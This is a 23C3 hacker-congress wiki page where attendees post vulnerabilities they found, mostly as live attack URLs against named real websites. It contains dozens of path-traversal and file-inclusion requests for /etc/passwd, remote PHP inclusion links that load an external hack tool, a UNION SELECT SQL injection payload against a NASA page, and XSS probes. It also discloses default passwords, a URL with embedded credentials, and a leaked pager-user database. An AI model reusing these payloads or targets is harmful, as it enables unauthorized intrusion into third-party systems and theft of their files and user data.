Hacks
From 23C3 Public Wiki
bad hacks
Remember: No harm to the network!
lol
My work just nullrouted some scriptkiddies :P
CTV Hacks - powered by !eof
Someone else "hacked" it, too. Dunno who it was. --codec
Why is changing a user defineable text a hack ? lamers! :-) --PoCSascha
Since you are involved! (next time I change the password!) :-D --BugBlue
POC hacks - powered by !eof
- fixed The Asterisk server of POC doesn't check the external incoming numbers, but puts a 0 in front. If you put 1 zero in from of the local number (0110) the system will change it (not really sure) to 00110 and will later on (maybe at the alcatel hardware) strip the 2 0's Means it will display a local call number
- maybe fixed the G5 computer of POC has/had a username test with password test
- not tested when abusing the asterisk server from poc they will block you at mac address level. If you abuse it from outside it will block the router.
reisecluster
Diverse aeh... reiseveranstalter mit einem leichten problem mit sessionids. Des weiteren ist ein iis5 nicht soo die beste idee auf einem windows2000... wie war das? webservices on iis are like rusian roulette with a glock? Egal... fast jedes formular auf den seiten geht ungefiltert an die ms-sql db. Naja,... ne ms-sql db mit den daten SAEMTLICHER seit erstellung der seite mit dem jeweiligen veranstaltern verreisten menschen... waer schon was nettes... Achja... in den profilen auf den seiten kann man PRIMA javascript etc einbasteln.
Achja, man WEISZ um die fehler... schon seit aeh... april.
Favoriten:
rufadmin: 'die seite ist trotzdem sicher'
'oberadmin' aller seiten: 'ich weisz um die fehler, man will aber nicht genug fuer ein beheben der fehler zahlen.'
http://www.frosch-sportreisen.de/
Mein favoriet ist aber immernoch http://www.ruf.de/index.html... vorallem... da ich weisz, dass deren admin uwe heiszt... naja... da hat doch nicht einer ne privatseite aufm firmenserver getestet...
NOC hacks - powered by !eof
The printers from the NOC helpdesks didn't have any password in the configuration. This is 'fixed'.
some other hacks
http://hannes:fnord2342@sputnik.congress.ccc.de - Sputnik RFID tracking ;-) http://prosieben.de/club_community/community/index.php?commFile=/foren/channel.php&kat_id=' http://sharp.de/suche/suche.php?search_string=%27
https://wi.hexonet.net/wi/54cd/include.php?http://foobar.servegame.com/ (note: httpS)
Interesting: This Domain Hoster is housing JURIS, the german database of law and order :) Funny: It delivers our content with it's own certificate (remote php inclusion is potentially possible)
Jamba! http://www.jamba.de/jcw/search/searchContent.do?&keywords=&displayname=Gruesse%20vom%2023C3!%20:-)
Even Google! http://www.google.de/search?hl=de&q=Gruesse+vom+23C3
there is a small gallery @flickr ... http://www.flickr.com/photos/75149036@N00/
default password on ssl-vpn: the complete network was open until now. the users can work without problems. the new password was emailed to the admin.
https://www.storage-station.com/
btw. i hope this is ok for the ethik hotline which was not reachable.
Bla? ;)
(both "fixed" by now)
http://www.microsoft.se/23C3
http://www.microsoft.dk/23C3
Blub? ;)
http://ich.will-ficken.info http://www.sage.edu/current/handbook/sca/handbook.php?page=http://events.ccc.de/congress/2006/ there is more ...
Webklabauter PHP Hacktool remote inclusion :) http://www.sage.edu/current/handbook/sca/handbook.php?page=http://events.ccc.de/congress/2006/images/4/4d/Wkb2.gif&wkb=1# check out: http://metalab.at/wiki/Webklabauter
hostmaster@1und1.com, please fix the next 2:
http://www.vgf-online.de/index.php?id=103&no_cache=1&dlpath=etc
http://www.browningteam-bayern.de/markt/Rollen/objekte/phpcksec.php?path=/proc/version
even more browsing fun:
http://www.wiwi.uni-bielefeld.de/~fachsch/phpkit/include.php?file=/etc/passwd
http://www.bayernmatrix.de/include.php?file=/etc/passwd
http://www.radio2life.de/include.php?file=/etc/passwd
http://www.safety-cars.de/include.php?file=/etc/passwd
http://www.toshiba-fussball-festival-neuss.de/portal/include.php?file=/etc/passwd
http://www.bindlach-aktionaer.de/include.php?file=/etc/passwd
http://www.wtodda.net/download.php?path=/etc/passwd
http://www.findwhitepapers.com/force-download.php?file=/etc/passwd
http://www.kpccorp.co.kr/catalog/download.php?file=/etc/passwd
http://www.tcrc.ca/download.php?file=/etc/passwd
http://www.lbtreuhand.ch/newstool/news_download.php?file=/etc/passwd
http://www.isn.net/~derekm/cgi-bin/edittag/edittag.pl?file=/etc/passwd
http://lynxx.org/cgi-bin/printsource.cgi?file=/etc/passwd
http://pathfinder.nss-group.com/intranet/download.php?file=/etc/passwd
http://auto-moto-club.homedns.org/script/download.php?ID=passwd&PATH=/etc/
http://innovex.veszprem.hu/onkormanyzatok/download.php?nev=passwd&kep=/etc/passwd
http://www.schaefer-technik.de/download_file.php?name=passwd&file=/etc/passwd
http://www.newtex.com/cgi-bin/prodspec.cgi?filename=/etc/passwd
http://www.msk.or.kr/inc/download.jsp?filePath=/etc/&fileName=passwd
http://www.barohard.co.kr/guide/download.php?filepath=/etc/&filename=passwd
http://sdss.ncdm.uic.edu/viewThroughputFiles.php?file=/etc/passwd
http://www.gwes.tnc.edu.tw/sking.php?action=dir&df_path=/etc/passwd
http://seewald.myftp.org/include.php?file=/etc/passwd
http://www.muensterland.de/include.php?file=/etc/passwd
http://www.neuvm.org/include.php?include=../../../../../../etc/passwd
https://www.sksi.net/filebarn/index.php?rootdir=/etc/&linkdir=/
http://www.montalbano.toscana.it/download.php?nomefile=/etc/passwd
http://www.volleybalspanje.nl/download.php?src=/etc/passwd
http://alt.baumrasen.de/cgi-bin/zitate/zitate.pl?output=/etc/passwd&table=on
http://www.euro-online.org/display.php?file=../../../../../../../etc/passwd&wgid=10&title=Who-can-you-trust---23C3-Berlin&parent=303
http://www.clubsnap.org/display.php?file=../../../../../../../../etc/passwd
http://www.bhncdsb.edu.on.ca/news/display.php?file=../../../../../../../../etc/passwd
http://www.isy-software.de/cgi-bin/show.cgi?z=../../../../../../etc/passwd
http://www.giga-hamburg.de/index.php?file=passwd&folder=../../../../../../../etc
http://cantor.mathematik.uni-ulm.de/m5/index.php?file=../../../../../../../../../etc/passwd
http://www.volvat.dyreklinikk.no/index.php?id=les_mer&file=../../../../../../../etc/passwd
http://www.witze-welt.de/index.php?page=../../../../../../../../../etc/passwd - sehr witzig
Not having a shadow-file is a very bad idea :-/
http://www.ethik.uni-jena.de/02/index.php?file=../../../../../../../../etc/passwd
http://www.lufthansa-cargo.com/download.jsp?file=../../../../../../../../../../../../../../../../../../../../etc/passwd
direkt zum Ausdrucken: http://janine.homedns.org/printDutyRoster.php?file=/etc/passwd
runterladen is komfortabler: http://www.archis.ch/cgi-bin/wPermission.cgi?file=../../../../../../../../../../../../../../../../etc/passwd
http://www.ghostwatcher.com/display.php?file=/etc/passwd
http://www.pitu.stm.sp.gov.br/download.php?file=/etc/passwd
http://www.laurentian.ca/sociology/index.php?file=../../../../../../../../etc/passwd
http://smt.dsa.fju.edu.tw/military%20defense/downloads/force-download.php?file=/etc/passwd
http://www.computrols.com/download.php?file=passwd&dir=/etc
http://www.stufr.de/xx/csc/include.php?file=/etc/passwd
http://climate.gsfc.nasa.gov/viewImage.php?id=-1%20UNION%20SELECT%200,0x32336333206f6e676f696e672e2e2e,2,0x3c696d67207372633d2268747470733a2f2f6576656e74732e636f6e67726573732e6363632e64652f636f6e67726573732f323030362d6d6564696177696b692f2f696d616765732f652f65632f323363335f3332307832343070785f32332e6a7067223e,4,5,6,7,8%20/**
Webcam:
Stuttgart Airport ?
http://195.243.185.195/view/index.shtml
oldschool
http://www.angelfire.com/funky/laneyards/ thinking of good old times ...
table bunny hack
realtime notification?
are you polling the Recent changes function for latest updates on this page and in the wiki? why not install a chat notification plug-in into the wiki, so we can hang out in an IRC channel or even jabber MUC and see in realtime when people edit stuff here? just a thought. --lynX
emessage.de / skyper user database
A sqlite DB with users of the german pager network Skyper / emessage has been seen on various ftp servers. Users can be searched here, the collected DB is e.g. here, if not, use the ftpsearch.
no hack just XSS :)
no hack just a strange checkPassword (having disabled javascript)
http://napoli.ipv6.telscom.ch/TelscomHomeEnvironment
need wordlist
need a wordlist (max. 5<8) characters. plase answer here. many thanks.
md5: check [1]
sorry, not a md5 hash list, a normal wordlist with numbers etcpp.
look at http://packetstormsecurity.nl/Crackers/wordlists/ or wait ~5 mins and leech my wordlist from tigh.central-services.congress.ccc.de/test/need_wordlist_please/please/